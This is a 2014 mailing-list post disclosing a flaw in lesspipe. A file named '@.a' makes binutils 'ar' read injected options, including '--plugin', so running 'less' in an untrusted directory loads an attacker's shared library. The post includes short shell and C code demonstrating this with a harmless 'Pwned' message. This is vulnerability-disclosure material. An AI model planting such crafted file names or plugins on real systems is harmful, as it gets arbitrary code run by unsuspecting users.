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Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument)

From: Alexander Cherepanov <cherepan () mccme ru>
Date: Thu, 11 Dec 2014 03:08:42 +0300

On 2014-11-23 12:24, Michal Zalewski wrote:
In short, many Linux distributions ship with the 'less' command
automagically interfaced to 'lesspipe'-type scripts, usually invoked
via LESSOPEN. This is certainly the case for CentOS and Ubuntu.

Unfortunately, many of these scripts appear to call a rather large
number of third-party tools that likely have not been designed with
malicious inputs in mind. On CentOS, lesspipe appears to include
things such as groff + troff + grotty, man, and cpio. On Ubuntu,
there's isoinfo (?!), ar from binutils, and so on. Ancient and obscure
compression utilities and doc converters crop up, too.

Yeah, it also leads to funny collisions in command line parsing.

Let's consider `ar` again. If it meets an option starting with '@' it treats the rest of the option as a file name to read additional options from. This can be dangerous but the user is supposed to read help/man and not to run command like `ar tv @file` or `readelf -x *` in an untrusted directory (all utilities from binutils seems to have this feature).

Then `less` enters the game. I don't see anything in --help/man for `less` which hints that '@' is a dangerous char to be in file names. Ok, let's see how it can be combined:


# imagine that we work in an untrusted dir (unpacked archive or
# something) and the dir contains the following files
printf '#include <stdio.h>\nvoid onload(void *v) { puts("Pwned"); }' | \
  gcc -fPIC -shared -o plugin.so -xc -
ar rc ./@.a /dev/null
echo '-s --plugin ./plugin.so ./@.a' > .a

# pretend that our distro activated lesspipe and finally run `less`
(eval "$(lesspipe)"; less @.a)


You should see "Pwned" inside `less`.

IMHO it crosses security boundary and should be considered a vuln in lesspipe. It neither validates file names nor documents the dangerous ones. It also perfectly illustrate how fragile this construction is.

Alexander Cherepanov

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